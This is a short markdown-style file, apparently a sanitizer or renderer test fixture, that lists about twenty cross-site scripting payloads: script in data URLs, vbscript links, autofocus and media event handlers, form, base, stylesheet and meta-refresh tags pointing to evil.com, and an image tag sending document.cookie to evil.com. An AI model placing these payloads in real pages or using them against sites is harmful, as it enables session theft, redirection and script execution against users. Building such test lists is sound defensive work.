| | --- |
| | license: mit |
| | --- |
| | |
| | <a href="data:text/html,<script>alert(1)</script>">data url</a> |
| |
|
| | <a href="vbscript:alert(1)">vbscript</a> |
| |
|
| | <form action="https://evil.com"><button>submit</button></form> |
| |
|
| | <base href="https://evil.com"> |
| |
|
| | <link rel="stylesheet" href="https://evil.com/steal.css"> |
| |
|
| | <style>@import url('https://evil.com/steal.css');</style> |
| |
|
| | <meta http-equiv="refresh" content="0;url=https://evil.com"> |
| |
|
| | <object data="https://evil.com/evil.swf"></object> |
| |
|
| | <embed src="https://evil.com/evil.swf"> |
| |
|
| | <video><source onerror="alert(1)"></video> |
| |
|
| | <body onload="alert(1)"> |
| |
|
| | <marquee onstart=alert(1)>xss</marquee> |
| |
|
| | <input onfocus=alert(1) autofocus> |
| |
|
| | <select autofocus onfocus=alert(1)> |
| |
|
| | <keygen autofocus onfocus=alert(1)> |
| |
|
| | <video autoplay onloadstart=alert(1)><source src="x"></video> |
| |
|
| | <audio autoplay onloadstart=alert(1)><source src="x"></audio> |
| |
|
| | <img src="https://evil.com/log?cookie="+document.cookie> |
| |
|
| | <svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/></svg> |
| |
|
| | <math><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></math> |
| |
|
